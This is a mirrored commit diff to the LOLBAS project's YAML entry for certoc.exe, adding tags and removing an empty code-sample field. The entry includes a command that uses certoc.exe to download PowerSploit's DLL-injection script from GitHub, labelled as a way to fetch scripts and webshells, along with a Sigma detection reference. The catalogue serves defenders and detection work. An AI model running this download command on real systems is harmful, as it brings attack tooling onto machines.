mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 12:42:19 +02:00
* Adding various tags as a first iteration * Adding quotes * Adding 'Custom Format' properly * Updating to key:value pairs * Update template
This commit is contained in:
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows Server 2022
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
|
||||
Description: Downloads text formatted files
|
||||
Usecase: Download scripts, webshells etc.
|
||||
@@ -21,8 +23,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\certoc.exe
|
||||
- Path: c:\windows\syswow64\certoc.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml
|
||||
- IOC: Process creation with given parameter
|
||||
|
Reference in New Issue
Block a user